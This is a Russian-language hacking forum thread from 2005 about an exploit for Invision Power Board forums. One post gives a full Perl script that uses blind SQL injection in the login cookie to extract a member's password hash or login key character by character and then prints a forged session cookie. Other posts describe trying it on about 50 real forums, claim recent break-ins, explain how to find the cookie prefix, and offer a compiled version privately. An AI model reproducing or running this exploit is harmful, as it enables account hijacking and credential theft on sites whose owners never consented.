с кем можно пообщатся насчет сплойта который тянет соль? |
17.12.2005, 03:02
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
С нами:
10763774
Репутация:
1
|
|
с кем можно пообщатся насчет сплойта который тянет соль?
типа оффтоп. но если будете тереть., киньте в личку пожалуйста ответ.
насчет сплойта для ипб,который тянет соль и который во всем инете битый (типа защита от дурака :-)))
у меня с перлом ну ооочень плохо, так что после нескольких часов напряженного скрипения мозгами примерно исправила там где примерно мне показалось, было неправильно :d :d :d
мнэ... самое интересное, что когда его запустила, он мне выдал строку, очень похожую на хеш пароля!!!
(32 символа и все такое....). но вот сижу бручу уже очень долго и никак не могу расбрутить.
вопрос, с кем можно проконсульироваться насчет кода (в том смысле правильно ли я исправила и просто пасс сложный) или может мне просто выдается какаято левая фигня похожая на хеш пасса и дальше мне мучаться с ним не стоит?
зы. извините что много написала.
зызы. перед тем как стереть,ответьте в личку плз
|
|
|
17.12.2005, 04:11
|
|
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
С нами:
11147366
Репутация:
901
|
|
Полностью рабочий вариант сплоита
#!/usr/bin/perl -w
use IO::Socket;
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $host = $ARGV[0]; # hostname
my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
my $user = $ARGV[2]; # userid to jack
my $iver = $ARGV[3]; # version 1 or 2
if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
my $dbug = $ARGV[5]; # debug?
if (!$ARGV[3])
{
print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b"," c","d","e","f");
my $outputs = '';
M1:
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d% 2527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$ i,1)%3d%2527$current%2527)/*";
$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Cookie: $cookie\n";
print $socket "Connection: close\n\n";
# If we get a valid sql request then this
# does not appear anywhere in the Location header
$pattern = 'act=Login&CODE=';
$failed = 0;
while(<$socket>)
{
if($dbug) { print };
if(/$pattern/) { $failed = 1; }
}
if($failed==0){
$outputs .= $current;
print "$i char: $current\n";
next M1;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
Последний раз редактировалось SladerNon; 17.12.2005 в 04:23..
|
|
|
|
18.12.2005, 02:59
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
С нами:
10763774
Репутация:
1
|
|
во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((
2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна
Последний раз редактировалось Danya; 18.12.2005 в 03:09..
|
|
|
|
18.12.2005, 03:32
|
|
Участник форума
Регистрация: 18.07.2005
Сообщений: 123
С нами:
10954466
Репутация:
60
|
|
Сообщение от Danya
во первых хочу сказать всем спасибо
во вторых хочу поздравить себя с тем ято я правильно исправила сплойт!!!
в третих хочу спросить, а какой вобще процент форумов на которых у работает этот сплойт? а то у меня вобще фигня какаято. уже штук 50 перебрала, только на двух сработало. да и то один заброшеный, а на втором аж 18 юзеров. вобще не весело както ((((
2SladerNon
ага. спасибо. но это несовсем тот сплойт. вернее совсем не тот.
кстате если скажеш откуда брать куки префикс, буду тебе благодарна
Сплойт мало-работает, т.к. дырка уже совсем бородатая.
кУки префикс надо сначала в собственном брАузере посмотреть зарегистрировавшись на таргет форуме.
|
|
|
|
18.12.2005, 08:47
|
|
Участник форума
Регистрация: 17.07.2004
Сообщений: 181
С нами:
11481506
Репутация:
97
|
|
да почему же... есть еще много дырявых форумов даже версий 1.*.*
нужно искать просто получше...
вчера парочку сломала к примеру)
если нужен компилированный сплойт стукнись в личку.
|
|
|
|
19.12.2005, 01:19
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами:
10798886
Репутация:
523
|
|
"7" это только первый символ хэша=)))
|
|
|
|
22.12.2005, 02:39
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
С нами:
10763774
Репутация:
1
|
|
спасибо. а все остальные я сама должна угадать, или как?
|
|
|
|
22.12.2005, 06:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами:
10946149
Репутация:
116
|
|
А сплойт от Коула не пашет?
|
|
|
|
19.12.2005, 01:10
|
|
Banned
Регистрация: 27.11.2005
Сообщений: 18
С нами:
10763774
Репутация:
1
|
|
поюзала сплойт (который в рамочке),
оно мне написало: 1 char: 7
и что теперь с этим делать, извиняюсь......
|
|
|
|
|
 |
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
химия своими руками
|
silveran |
Болталка |
43 |
11.01.2006 22:05 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
